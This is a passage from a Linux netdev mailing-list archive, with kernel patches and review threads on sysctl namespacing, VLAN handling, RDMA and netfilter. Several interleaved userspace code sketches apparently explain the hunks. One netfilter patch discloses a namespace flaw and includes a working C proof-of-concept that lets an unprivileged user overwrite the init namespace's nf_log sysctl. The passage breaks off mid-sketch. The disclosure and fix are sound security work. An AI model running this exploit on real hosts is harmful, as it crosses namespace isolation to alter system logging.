@@ -473,8 +473,10 @@ int sctp_sysctl_net_register(struct net *net)
 	if (!table)
 		return -ENOMEM;
 
-	for (i = 0; table[i].data; i++)
+	for (i = 0; table[i].data; i++) {
 		table[i].data += (char *)(&net->sctp) - (char *)&init_net.sctp;
+		table[i].namespaced = true;
+	}
 
 	net->sctp.sysctl_header = register_net_sysctl(net, "net/sctp", table);
 	if (net->sctp.sysctl_header == NULL) {
diff --git a/net/sysctl_net.c b/net/sysctl_net.c
index 46a71c7..dd6742b 100644
--- a/net/sysctl_net.c
+++ b/net/sysctl_net.c
@@ -45,16 +45,24 @@ static int net_ctl_permissions(struct ctl_table_header *head,
 	kuid_t root_uid = make_kuid(net->user_ns, 0);
 	kgid_t root_gid = make_kgid(net->user_ns, 0);
 
-	/* Allow network administrator to have same access as root. */
-	if (ns_capable_noaudit(net->user_ns, CAP_NET_ADMIN) ||
-	    uid_eq(root_uid, current_euid())) {
-		int mode = (table->mode >> 6) & 7;
-		return (mode << 6) | (mode << 3) | mode;
-	}
-	/* Allow netns root group to have the same access as the root group */
-	if (in_egroup_p(root_gid)) {
-		int mode = (table->mode >> 3) & 7;
-		return (mode << 3) | mode;
+	/* Allow network administrator to have same access as root - but only if
+	 * namespacing is implemented for this sysctl.
+	 */
+	if (table->namespaced) {
+		if (ns_capable_noaudit(net->user_ns, CAP_NET_ADMIN) ||
+		    uid_eq(root_uid, current_euid())) {
+			int mode = (table->mode >> 6) & 7;
+
+			return (mode << 6) | (mode << 3) | mode;
+		}
+		/* Allow netns root group to have the same access as the root
+		 * group.
+		 */
+		if (in_egroup_p(root_gid)) {
+			int mode = (table->mode >> 3) & 7;
+
+			return (mode << 3) | mode;
+		}
 	}
 	return table->mode;
 }
-- 
2.1.4
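
For readers following the net_ctl_permissions() hunk above, the mode arithmetic can be tried out in userspace. This is only a sketch under stated assumptions: struct demo_ctl_table and struct demo_caller are hypothetical stand-ins (the real code uses struct ctl_table, ns_capable_noaudit(), uid_eq() and in_egroup_p()), and the two booleans in demo_caller simply summarize the outcome of those checks.

```c
#include <stdbool.h>

/* Hypothetical stand-in for the struct ctl_table fields used by the hunk. */
struct demo_ctl_table {
	unsigned int mode;	/* e.g. 0644 */
	bool namespaced;	/* the flag this patch adds */
};

/* Hypothetical summary of the capability/uid/gid checks in the real code. */
struct demo_caller {
	bool netns_admin;	/* CAP_NET_ADMIN in the netns, or netns root uid */
	bool in_root_group;	/* member of the netns root gid */
};

static unsigned int demo_net_ctl_permissions(const struct demo_ctl_table *table,
					     const struct demo_caller *who)
{
	/* Elevated access is only considered for namespaced sysctls. */
	if (table->namespaced) {
		if (who->netns_admin) {
			/* Copy the owner bits into group and other. */
			unsigned int mode = (table->mode >> 6) & 7;

			return (mode << 6) | (mode << 3) | mode;
		}
		if (who->in_root_group) {
			/* Copy the group bits into other; owner bits drop out. */
			unsigned int mode = (table->mode >> 3) & 7;

			return (mode << 3) | mode;
		}
	}
	return table->mode;
}
```

With mode 0644, a netns admin ends up with 0666 on a namespaced entry, while the same caller gets the unmodified 0644 on an entry that is not marked namespaced.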

^ permalink raw reply related

* Re: stmmac/RTL8211F/Meson GXBB: TX throughput problems
From: André Roth @ 2016-09-18 20:42 UTC (permalink / raw)
  To: Giuseppe CAVALLARO
  Cc: Martin Blumenstingl, netdev, linux-amlogic, Alexandre Torgue
In-Reply-To: <ce15ad26-2d07-655d-b813-947ad86696ac@st.com>


Hello,

> For example, you could try disabling the scatter-gather or tx-csum
> via ethtool and seeing if there is some benefit; so we could imagine
> some problem on your HW or SYNP MAC integration for checksumming
> on tx side.

Disabling either of the following:
  ethtool -K eth0 sg off
or:
  ethtool -K eth0 tx off
does not prevent the network communication from going down.

> Also you could check the AXI tuning and PBL value. To be honest
> (thinking about your problem) I actually suspect some related
> problem in the bus setup. So I suggest you play with these values
> (better if you ask for values from HW validation on your side).
> Otherwise the stmmac uses a default that may not be good for your
> platform. For example, sometimes I have seen that PBL is better if
> reduced to 8 instead of 32 and w/o 4xPBL...

How can I set those values?

thanks for your time,

 andre

^ permalink raw reply

* Re: [PATCH] net: hns: add function declarations in hns_dsaf_mac.h
From: Arnd Bergmann @ 2016-09-18 20:37 UTC (permalink / raw)
  To: Baoyou Xie
  Cc: yisen.zhuang, salil.mehta, davem, yankejian, huangdaode,
	lipeng321, netdev, linux-kernel, xie.baoyou
In-Reply-To: <1474189896-20417-1-git-send-email-baoyou.xie@linaro.org>

On Sunday, September 18, 2016 5:11:36 PM CEST Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no previous prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no previous prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]
> 
> In fact, these two functions are not declared in any file, but should
> be declared in a header file so that they can be recognized in other files.
> 
> So this patch adds the declarations into
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
> 
> Signed-off-by: Baoyou Xie <baoyou.xie@linaro.org>
> 

Why can't these be declared static?

	Arnd

^ permalink raw reply

* RE: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues
From: Adit Ranadive @ 2016-09-18 20:36 UTC (permalink / raw)
  To: Leon Romanovsky, Yuval Shaia
  Cc: dledford@redhat.com, linux-rdma@vger.kernel.org, pv-drivers,
	netdev@vger.kernel.org, linux-pci@vger.kernel.org,
	Jorgen S. Hansen, Aditya Sarwade, George Zhang, Bryan Tan
In-Reply-To: <20160918170707.GL2923@leon.nu>

On Sun, Sep 18, 2016 at 10:07:18 -0700, Leon Romanovsky wrote: 
> On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> > Hi Adit,
> > Please see my comments inline.
> >
> > Besides that I have no more comment for this patch.
> >
> > Reviewed-by: Yuval Shaia <yuval.shaia@oracle.com>
> >
> > Yuval
> >
> > On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > > +
> > > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp **cur_qp,
> > > > > +			   struct ib_wc *wc)
> > > > > +{
> > > > > +	struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > > +	int has_data;
> > > > > +	unsigned int head;
> > > > > +	bool tried = false;
> > > > > +	struct pvrdma_cqe *cqe;
> > > > > +
> > > > > +retry:
> > > > > +	has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > > +					    cq->ibcq.cqe, &head);
> > > > > +	if (has_data == 0) {
> > > > > +		if (tried)
> > > > > +			return -EAGAIN;
> > > > > +
> > > > > +		/* Pass down POLL to give physical HCA a chance to poll. */
> > > > > +		pvrdma_write_uar_cq(dev, cq->cq_handle | PVRDMA_UAR_CQ_POLL);
> > > > > +
> > > > > +		tried = true;
> > > > > +		goto retry;
> > > > > +	} else if (has_data == PVRDMA_INVALID_IDX) {
> > > >
> > > > I didn't go through the entire life cycle of the RX-ring's head and tail, but you
> > > > need to make sure that the PVRDMA_INVALID_IDX error is a recoverable one, i.e.
> > > > there is some probability that the next call to pvrdma_poll_one will be fine.
> > > > Otherwise it is an endless loop.
> > >
> > > We have never run into this issue internally but I don't think we can recover here
> >
> > I briefly reviewed the life cycle of the RX-ring's head and tail and didn't
> > catch any suspicious place that might corrupt it.
> > So glad to see that you never encountered this case.
> >
> > > in the driver. The only way to recover would be to destroy and recreate the CQ
> > > which we shouldn't do since it could be used by multiple QPs.
> >
> > Agree.
> > But don't they hit the same problem too?
> >
> > > We don't have a way yet to recover in the device. Once we add that this check
> > > should go away.
> >
> > To be honest I have no idea how to do that - I was expecting driver vendors
> > to come up with ideas :)
> > I once came up with an idea to force a restart of the driver but it was
> > rejected.
> >
> > >
> > > The reason I returned an error value from poll_cq in v3 was to break the possible
> > > loop so that it might give clients a chance to recover. But since poll_cq is not expected
> > > to fail I just log the device error here. I can revert to that version if you want to break
> > > the possible loop.
> >
> > Clients (ULPs) cannot recover from this case. They do not even check the
> > reason for the error and treat any error as -EAGAIN.
> 
> It is because poll_one is not expected to fail.

Poll_one is an internal function in our driver. ULPs should still be okay I think as long as poll_cq
does not fail, no?
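
To make the control flow under discussion easier to follow, here is a userspace sketch of the retry-once pattern from the quoted pvrdma_poll_one() hunk. Everything prefixed with demo_ is hypothetical: the struct models a ring whose completions may only become visible after the device is kicked, and returning -EAGAIN for the invalid-index case is an assumption, since the quoted hunk does not show that branch.

```c
#include <errno.h>
#include <stdbool.h>

#define DEMO_INVALID_IDX (-1)	/* hypothetical stand-in for PVRDMA_INVALID_IDX */

/* Hypothetical model of a completion queue ring. */
struct demo_cq {
	int pending;		/* completions currently visible in the ring */
	int behind_kick;	/* completions that show up only after a kick */
	int kicks;		/* how often the device was asked to poll */
	bool corrupt;		/* ring state is invalid */
};

static int demo_ring_has_data(const struct demo_cq *cq)
{
	if (cq->corrupt)
		return DEMO_INVALID_IDX;
	return cq->pending > 0;
}

/* Models the UAR write that gives the physical HCA a chance to poll. */
static void demo_kick(struct demo_cq *cq)
{
	cq->kicks++;
	cq->pending += cq->behind_kick;
	cq->behind_kick = 0;
}

static int demo_poll_one(struct demo_cq *cq)
{
	bool tried = false;
	int has_data;

retry:
	has_data = demo_ring_has_data(cq);
	if (has_data == 0) {
		if (tried)
			return -EAGAIN;	/* still empty after one kick: give up */
		demo_kick(cq);
		tried = true;
		goto retry;
	} else if (has_data == DEMO_INVALID_IDX) {
		/* Assumption: report "nothing to poll" rather than loop. */
		return -EAGAIN;
	}

	cq->pending--;		/* consume one completion */
	return 0;
}
```

The tried flag bounds the loop to a single retry per call, so an empty ring costs at most one kick; the open question in the thread is only what a caller can do when the invalid-index branch keeps firing on every call.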

^ permalink raw reply

* Re: [PATCH] net: skbuff: Fix length validation in skb_vlan_pop()
From: pravin shelar @ 2016-09-18 20:26 UTC (permalink / raw)
  To: Shmulik Ladkani
  Cc: Jiri Pirko, David S . Miller, Linux Kernel Network Developers
In-Reply-To: <1474193358-20133-1-git-send-email-shmulik.ladkani@gmail.com>

On Sun, Sep 18, 2016 at 3:09 AM, Shmulik Ladkani
<shmulik.ladkani@gmail.com> wrote:
> In 93515d53b1
>   "net: move vlan pop/push functions into common code"
> skb_vlan_pop was moved from its private location in openvswitch to
> skbuff common code.
>
> In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
> that skb->len is sufficient for the existence of a vlan_ethhdr
> (if skb->len < VLAN_ETH_HLEN then pop was a no-op).
>
> This validation was moved as is into the new common 'skb_vlan_pop'.
>
> Alas, in its original location (openvswitch), there's a guarantee that
> 'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
> condition made sense.
> However there's no such guarantee in the generic 'skb_vlan_pop'.
>
> For short packets received in rx path going through 'skb_vlan_pop',
> this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
> is in payload), or to fail moving next tag into hw-accel tag.
>
> Instead, verify that 'skb->mac_len' is sufficient.
>
> Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
> ---
>  Spotted by code review while doing work augmenting tc act vlan.
>
>  net/core/skbuff.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/net/core/skbuff.c b/net/core/skbuff.c
> index 1e329d4112..cc2c004838 100644
> --- a/net/core/skbuff.c
> +++ b/net/core/skbuff.c
> @@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
>         } else {
>                 if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
>                               skb->protocol != htons(ETH_P_8021AD)) ||
> -                            skb->len < VLAN_ETH_HLEN))
> +                            skb->mac_len < VLAN_ETH_HLEN))

There is already check in __skb_vlan_pop() to validate skb for a vlan
header. So it is safe to drop this check entirely.

^ permalink raw reply

* Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation
From: Or Gerlitz @ 2016-09-18 20:24 UTC (permalink / raw)
  To: Leon Romanovsky, Amir Vadai
  Cc: David S. Miller, Linux Netdev List, Tariq Toukan, Hadar Har-Zion,
	Roi Dayan, Or Gerlitz
In-Reply-To: <20160918180223.GM2923@leon.nu>

On Sun, Sep 18, 2016 at 9:02 PM, Leon Romanovsky <leon@kernel.org> wrote:
> On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
>> From: Roi Dayan <roid@mellanox.com>

>> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>>  {
>>       struct mlx5_cmd_fc_bulk *b;
>> -     int outlen = sizeof(*b) +
>> +     int outlen =
>>               MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>>               MLX5_ST_SZ_BYTES(traffic_counter) * num;
>>
>> -     b = kzalloc(outlen, GFP_KERNEL);
>> +     b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>>       if (!b)
>>               return NULL;

>                   ^^^^^^^^^ very controversial decision.
> The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
> failure is the same for success scenario too.

Sure, we will look at your comment and, if needed, come up with a
cleanup patch for net-next (4.9)

> It is not related to the proposed patch.

Correct, the proposed patch fixes a memory corruption that we want to
sort out for net (4.8)

Or.
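
For reference, the allocation pattern the quoted hunk moves to can be sketched in userspace as follows. This is an illustration under assumptions, not the mlx5 code: struct demo_bulk is a hypothetical layout with a trailing output buffer, and the two size parameters stand in for the MLX5_ST_SZ_BYTES() values. The reading that outlen is later used as the size of the output buffer alone (so it must not include the header) is an inference from the diff, not something stated in the thread.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical layout: bookkeeping header followed by the output buffer. */
struct demo_bulk {
	unsigned short id;
	int num;
	size_t outlen;		/* size of out[] only, header excluded */
	unsigned char out[];	/* flexible array member */
};

/*
 * hdr_sz and per_counter_sz are hypothetical stand-ins for the
 * query_flow_counter_out and traffic_counter sizes.
 */
static struct demo_bulk *demo_bulk_alloc(unsigned short id, int num,
					 size_t hdr_sz, size_t per_counter_sz)
{
	struct demo_bulk *b;
	size_t outlen = hdr_sz + per_counter_sz * (size_t)num;

	/* Allocate header plus buffer, but record only the buffer size. */
	b = calloc(1, sizeof(*b) + outlen);
	if (!b)
		return NULL;

	b->id = id;
	b->num = num;
	b->outlen = outlen;
	return b;
}
```

If outlen also counted sizeof(*b), anything that later writes outlen bytes starting at out[] would run past the end of the allocation by the size of the header.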

^ permalink raw reply

* Re: skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected
From: Linus Torvalds @ 2016-09-18 20:12 UTC (permalink / raw)
  To: Al Viro
  Cc: Jens Axboe, Nick Piggin, linux-fsdevel, Network Development,
	Eric Dumazet
In-Reply-To: <20160918193112.GF2356@ZenIV.linux.org.uk>

On Sun, Sep 18, 2016 at 12:31 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
> FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
> might come from compound pages and I'm not entirely convinced that we won't
> end up with coalesced fragments putting more than PAGE_SIZE into a single
> pipe_buffer.  And that could badly confuse a bunch of code.

The pipe buffer code is actually *supposed* to handle any size
allocations at all. They should *not* be limited by pages, exactly
because the data can come from huge-pages or just multi-page
allocations. It's definitely possible with networking, and networking
is one of the *primary* targets of splice in many ways.

So if the splice code ends up being confused by "this is not just
inside a single page", then the splice code is buggy, I think.

Why would splice_write() cases be confused anyway? A filesystem needs
to be able to handle the case of "this needs to be split" regardless,
since even if the source buffer were to fit in a page, the offset
might obviously mean that the target won't fit in a page.

Now, if you decide that you want to make the iterator always split
those possibly big cases and never have big iovec entries, I guess
that would potentially be ok. But my initial reaction is that they are
perfectly normal and should be handled normally, and any code that
depends on a splice buffer fitting in one page is just buggy and
should be fixed.

                 Linus
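
The point about offsets forcing a split can be checked with a little arithmetic. The helper below is a hypothetical userspace sketch (demo_count_chunks is not a kernel function): it counts how many page-bounded pieces a buffer of len bytes occupies when it starts at a given offset.

```c
#include <stddef.h>

/*
 * Number of page-bounded pieces needed for len bytes starting at offset.
 * Hypothetical helper for illustration; page_size must be non-zero.
 */
static size_t demo_count_chunks(size_t offset, size_t len, size_t page_size)
{
	size_t first;

	if (len == 0)
		return 0;

	/* Only the position inside the first page matters. */
	first = offset % page_size;
	return (first + len + page_size - 1) / page_size;
}
```

With 4096-byte pages, a 4096-byte buffer at offset 0 fits in one piece, but the same buffer at offset 100 needs two, and even a 200-byte buffer at offset 4000 straddles a page boundary. So a consumer has to cope with splitting whether or not the source ever exceeds a page.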

^ permalink raw reply

* Re: [patch net-next RFC 0/2] fib4 offload: notifier to let hw to be aware of all prefixes
From: Florian Fainelli @ 2016-09-18 20:00 UTC (permalink / raw)
  To: Jiri Pirko, netdev
  Cc: davem, idosch, eladr, yotamg, nogahf, ogerlitz, roopa, nikolay,
	linville, tgraf, gospo, sfeldma, ast, edumazet, hannes, dsa, jhs,
	vivien.didelot, john.fastabend, andrew, ivecera
In-Reply-To: <1473163300-2045-1-git-send-email-jiri@resnulli.us>

On 06/09/2016 at 05:01, Jiri Pirko wrote:
> From: Jiri Pirko <jiri@mellanox.com>
> 
> This is RFC, unfinished. I came across some issues in the process so I would
> like to share those and restart the fib offload discussion in order to make it
> really usable.
> 
> So the goal of this patchset is to allow driver to propagate all prefixes
> configured in kernel down to HW. This is necessary for routing to work
> as expected. If we don't do that, HW might forward prefixes known to kernel
> incorrectly. Take an example when default route is set in switch HW and there
> is an IP address set on a management (non-switch) port.
> 
> Currently, only fibs related to the switch port netdev are offloaded using
> switchdev ops. This model is not extendable so the first patch introduces
> a replacement: notifier to propagate fib additions and removals to whoever
> interested. The second patch makes mlxsw to adopt this new way, registering
> one notifier block for each mlxsw (asic) instance.

Instead of introducing another specialization of a notifier_block
implementation, could we somehow have a kernel-based netlink listener
which receives the same kind of event information from rtmsg_fib()?

The reason is that having such a facility would hook directly onto
existing rtmsg_* calls that exist throughout the stack, and that seems
to scale better.
-- 
Florian


* Re: [iproute PATCH] tc: don't accept qdisc 'handle' greater than ffff
From: Phil Sutter @ 2016-09-18 19:47 UTC (permalink / raw)
  To: Davide Caratti; +Cc: netdev, Stephen Hemminger, Hangbin Liu
In-Reply-To: <bdc0d8e58be9344b44fcd64a56b5b62004c108a1.1473930575.git.dcaratti@redhat.com>

On Fri, Sep 16, 2016 at 10:30:00AM +0200, Davide Caratti wrote:
> since get_qdisc_handle() truncates the input value to 16 bit, return an
> error and prompt "invalid qdisc ID" in case input 'handle' parameter needs
> more than 16 bit to be stored.
> 
> Signed-off-by: Davide Caratti <dcaratti@redhat.com>

Acked-by: Phil Sutter <phil@nwl.cc>
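
For readers following along, the check described in the quoted commit
message can be sketched roughly as below. This is an illustration under
stated assumptions, not the iproute2 code: parse_qdisc_major() is a
hypothetical helper, and the real get_qdisc_handle() may differ in its
details. It only shows the idea of rejecting a major number that would
otherwise be silently truncated to 16 bits.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/*
 * Hypothetical helper, not the iproute2 function: parse a qdisc handle
 * major given in hex (optionally followed by ':') and store it in
 * *handle as major << 16. Returns 0 on success, -1 if the string is
 * malformed or the major does not fit in 16 bits.
 */
int parse_qdisc_major(const char *str, uint32_t *handle)
{
	char *end;
	unsigned long maj;

	assert(str != NULL && handle != NULL);

	errno = 0;
	maj = strtoul(str, &end, 16);
	if (errno != 0 || end == str)
		return -1;      /* overflow or no hex digits at all */
	if (*end == ':')
		end++;
	if (*end != '\0')
		return -1;      /* trailing characters, e.g. a minor number */
	if (maj > 0xffffUL)
		return -1;      /* would be truncated to 16 bits */

	*handle = (uint32_t)maj << 16;
	return 0;
}
```

Under these assumptions "ffff:" is accepted and "10000:" is rejected
instead of being quietly turned into handle 0.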


* [PATCH] netfilter: fix namespace handling in nf_log_proc_dostring
From: Jann Horn @ 2016-09-18 19:40 UTC (permalink / raw)
  To: Pablo Neira Ayuso, Patrick McHardy, Jozsef Kadlecsik,
	David S. Miller
  Cc: netfilter-devel, netdev, security

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.
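
The idea of the fix can be modelled in user space as follows. This is a
simplified sketch, not the kernel code: struct ns and struct entry are
stand-ins invented here for struct net and struct ctl_table, and
entry_register()/entry_write() are hypothetical names. The handler acts
on the namespace recorded at registration time and ignores the
namespace of the caller.

```c
#include <assert.h>
#include <string.h>

struct ns {                     /* stand-in for struct net */
	char logger[16];
};

struct entry {                  /* stand-in for struct ctl_table */
	void *extra2;           /* owning namespace, set at registration */
};

/* Registration: remember which namespace this entry belongs to. */
void entry_register(struct entry *e, struct ns *owner)
{
	e->extra2 = owner;
}

/*
 * Write handler: update the namespace stored in the entry, not the
 * namespace of whoever happens to call write() on the open file.
 */
void entry_write(struct entry *e, struct ns *caller_ns, const char *val)
{
	struct ns *target = e->extra2;

	(void)caller_ns;        /* deliberately ignored */
	assert(target != NULL);
	strncpy(target->logger, val, sizeof(target->logger) - 1);
	target->logger[sizeof(target->logger) - 1] = '\0';
}
```

In this model, a write issued from the init namespace through an entry
registered for a child namespace changes only the child's logger.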

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
---
 net/netfilter/nf_log.c | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write,
 	char buf[NFLOGGER_NAME_LEN];
 	int r = 0;
 	int tindex = (unsigned long)table->extra1;
-	struct net *net = current->nsproxy->net_ns;
+	struct net *net = table->extra2;
 
 	if (write) {
 		struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 				 3, "%d", i);
 			nf_log_sysctl_table[i].procname	=
 				nf_log_sysctl_fnames[i];
-			nf_log_sysctl_table[i].data = NULL;
 			nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
 			nf_log_sysctl_table[i].mode = 0644;
 			nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
 		}
 	}
 
+	for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+		table[i].extra2 = net;
+
 	net->nf.nf_log_dir_header = register_net_sysctl(net,
 						"net/netfilter/nf_log",
 						table);
-- 
2.1.4


* Re: [PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action
From: Jamal Hadi Salim @ 2016-09-18 19:41 UTC (permalink / raw)
  To: Shmulik Ladkani, David S . Miller; +Cc: Jiri Pirko, netdev
In-Reply-To: <1474209225-23665-3-git-send-email-shmulik.ladkani@gmail.com>

On 16-09-18 10:33 AM, Shmulik Ladkani wrote:
> TCA_VLAN_ACT_MODIFY allows one to change an existing tag.
>
> It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
> priority).
> If packet is vlan tagged, then the tag gets overwritten according to
> user specified attributes.
>
> For example, this allows user to replace a tag's vid while preserving
> its priority bits (as opposed to "action vlan pop pipe action vlan push").
>
> Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
> ---
>  include/uapi/linux/tc_act/tc_vlan.h |  1 +
>  net/sched/act_vlan.c                | 29 ++++++++++++++++++++++++++++-
>  2 files changed, 29 insertions(+), 1 deletion(-)
>
> diff --git a/include/uapi/linux/tc_act/tc_vlan.h b/include/uapi/linux/tc_act/tc_vlan.h
> index be72b6e384..bddb272b84 100644
> --- a/include/uapi/linux/tc_act/tc_vlan.h
> +++ b/include/uapi/linux/tc_act/tc_vlan.h
> @@ -16,6 +16,7 @@
>
>  #define TCA_VLAN_ACT_POP	1
>  #define TCA_VLAN_ACT_PUSH	2
> +#define TCA_VLAN_ACT_MODIFY	3
>
>  struct tc_vlan {
>  	tc_gen;
> diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
> index 59a8d3150a..e5eeaa7a01 100644
> --- a/net/sched/act_vlan.c
> +++ b/net/sched/act_vlan.c
> @@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
>  	struct tcf_vlan *v = to_vlan(a);
>  	int action;
>  	int err;
> +	u16 tci;
>
>  	spin_lock(&v->tcf_lock);
>  	tcf_lastuse_update(&v->tcf_tm);
> @@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
>  		if (err)
>  			goto drop;
>  		break;
> +	case TCA_VLAN_ACT_MODIFY:
> +		if (!skb_vlan_tagged(skb))
> +			goto unlock;
> +		/* extract existing tag (and guarantee no hwaccel tag) */
> +		if (skb_vlan_tag_present(skb)) {
> +			tci = skb_vlan_tag_get(skb);
> +			skb->vlan_tci = 0;
> +		} else {
> +			if (skb->mac_len < VLAN_ETH_HLEN)
> +				goto unlock;
> +			err = __skb_vlan_pop(skb, &tci);
> +			if (err)
> +				goto drop;
> +		}
> +		/* replace the vid */
> +		tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
> +		/* replace prio bits, if tcfv_push_prio specified */
> +		if (v->tcfv_push_prio) {
> +			tci &= ~VLAN_PRIO_MASK;
> +			tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
> +		}
> +		/* put updated tci as hwaccel tag */
> +		__vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
> +		break;
>  	default:
>  		BUG();
>  	}
> @@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr *nla,
>  	case TCA_VLAN_ACT_POP:
>  		break;
>  	case TCA_VLAN_ACT_PUSH:
> +	case TCA_VLAN_ACT_MODIFY:
>  		if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
>  			if (exists)
>  				tcf_hash_release(*a, bind);
> @@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct tc_action *a,
>  	if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
>  		goto nla_put_failure;
>
> -	if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
> +	if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
> +	     v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
>  	    (nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
>  	     nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
>  			  v->tcfv_push_proto) ||
>


Nice. If you didn't do it I would have ;->

Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
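
For reference, the TCI arithmetic in the quoted MODIFY case can be tried
out in user space with a sketch like the one below. tci_modify() is a
name made up for this illustration; the three masks are redefined
locally with the values used by the kernel's VLAN header, and the
function mirrors only the bit manipulation, not the skb handling.

```c
#include <assert.h>
#include <stdint.h>

/* Local copies of the kernel's VLAN TCI layout constants. */
#define VLAN_PRIO_MASK   0xe000u
#define VLAN_PRIO_SHIFT  13
#define VLAN_VID_MASK    0x0fffu

/*
 * Replace the VLAN ID in tci with vid. If prio is non-zero, replace the
 * priority bits as well; otherwise the existing priority is kept.
 */
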